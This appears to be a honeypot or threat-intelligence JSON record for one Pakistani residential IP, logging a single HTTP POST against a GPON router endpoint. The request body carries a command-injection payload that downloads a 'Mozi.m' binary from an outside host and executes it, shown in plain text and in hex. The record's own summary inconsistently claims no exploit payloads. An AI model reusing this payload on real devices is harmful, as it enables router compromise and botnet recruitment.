{"ip":"103.74.21.167","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"residential ISP","why":["1 event(s), fewer than 10 distinct ports, no exploit payloads.","Not in any known-scanner range."]},"first_seen":"2026-07-09T03:13:06","last_seen":"2026-07-09T03:13:06","events_24h":0,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Sindh","city":"Karachi","lat":24.8591,"lon":66.9983,"asn":139879,"org":"Galaxy Broadband"},"source_domain":"103-74-21-167.galaxy.net.pk","known_scanners":[],"scanner_tag":{"key":"peeringdb:as139879","label":"Galaxy Broadband","category":"isp","url":"https://www.peeringdb.com/asn/139879"},"cve_matches":[{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"}],"malware":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0600_1386cd485c90"]},"fingerprint_peers":{"po11nn0600_1386cd485c90":38},"user_agents":["Hello, World"],"timeline":[{"date":"2026-07-09","count":1}],"recent_events":[{"timestamp":"2026-07-09T03:13:06","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:80\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://172.168.180.231:58423/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a38300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f3137322e3136382e3138302e3233313a35383432332f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e38303b73682b2f746d702f67706f6e3830266970763d30","method":"POST","user_agent":"Hello, World","community_id":"1:PGmwNgP4G+/rsHnKQwi1vcOzVe4=","ja3":"","session":"db541d96-dfa4-4cde-b3cc-bf310e081e06","seq":1,"duration_ms":100,"bytes_in":321,"bytes_out":78}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:80","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]}],"data_as_of":"2026-07-10T20:23:05.320637+00:00"}